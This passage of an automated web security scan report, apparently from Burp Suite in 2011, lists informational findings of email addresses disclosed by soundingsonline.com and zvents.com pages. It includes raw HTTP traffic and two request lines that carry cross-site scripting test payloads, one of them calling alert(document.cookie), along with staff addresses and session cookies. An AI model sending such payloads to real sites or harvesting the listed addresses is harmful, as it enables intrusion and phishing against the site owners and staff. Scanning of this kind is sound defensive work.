<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.203. http://www.soundingsonline.com/component/yvcomment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/yvcomment/

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.204. http://www.soundingsonline.com/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

The following email addresses were disclosed in the response:

advertising@soundingspub.com
circulation@soundingspub.com
e.cirillo@soundingspub.com
editorial@soundingspub.com
info@soundingspub.com
m.grzybowski@soundingspub.com
s.vasmatics@soundingspub.com
webmaster@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:circulation@soundingspub.com">circulation@soundingspub.com</a>
...[SNIP]...
<a href="mailto:advertising@soundingspub.com">advertising@soundingspub.com</a>
...[SNIP]...
<a href="mailto:editorial@soundingspub.com">editorial@soundingspub.com</a>
...[SNIP]...
<a href="mailto:s.vasmatics@soundingspub.com">m.grzybowski@soundingspub.com</a>
...[SNIP]...
<a href="mailto:webmaster@soundingspub.com">webmaster@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.205. http://www.soundingsonline.com/features previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.206. http://www.soundingsonline.com/features/destinations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/destinations

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.207. http://www.soundingsonline.com/features/in-depth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.208. http://www.soundingsonline.com/features/justyesterday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.209. http://www.soundingsonline.com/features/lifestyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.210. http://www.soundingsonline.com/features/profiles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.211. http://www.soundingsonline.com/features/technical previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.212. http://www.soundingsonline.com/features/type-of-boat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.213. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.214. http://www.soundingsonline.com/more/digital-publications previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.215. http://www.soundingsonline.com/more/the-masters-series previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

The following email addresses were disclosed in the response:

c.brayfield@soundingspub.com
e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:c.brayfield@soundingspub.com">c.brayfield@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.216. http://www.soundingsonline.com/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.217. http://www.soundingsonline.com/news/coastwise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.218. http://www.soundingsonline.com/news/dispatches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.219. http://www.soundingsonline.com/news/home-waters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.220. http://www.soundingsonline.com/news/mishaps-a-rescues previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.221. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

21.222. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/index.php

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.223. http://www.soundingsonline.com/news/sailing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.224. http://www.soundingsonline.com/news/todays-top-stories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:17:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.225. http://www.soundingsonline.com/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.226. http://www.soundingsonline.com/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/s_code.js

Issue detail

The following email address was disclosed in the response:

kevin.rogers@dominionenterprises.com

Request

GET /s_code.js HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Content-Length: 34160
Content-Type: application/x-javascript
Last-Modified: Tue, 25 Jan 2011 16:00:37 GMT
Accept-Ranges: bytes
ETag: "1c1772a9bccb1:2b20"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 17:18:11 GMT
Connection: close

/*
SiteCatalyst: H.21.1.
kevin.rogers@dominionenterprises.com
01.25.2011
*/

function switchSuite() {
   var suiteList= "";
       if (location.hostname.indexOf('mobile')!=-1) {
           suiteList += "desoundings,desoundingsmobile";
       } else {
           suiteList += "deso
...[SNIP]...

21.227. http://www.soundingsonline.com/site-map previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.228. http://www.soundingsonline.com/subscription-services previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.229. http://www.soundingsonline.com/subscription-services/preview-current-issue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

21.230. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/subscribe-to-e-newsletter

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.231. http://www.zvents.com/javascripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/javascripts/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /javascripts/s_code.js HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:35 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:35 GMT
Cache-Control: max-age=86400
Content-Length: 39869

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
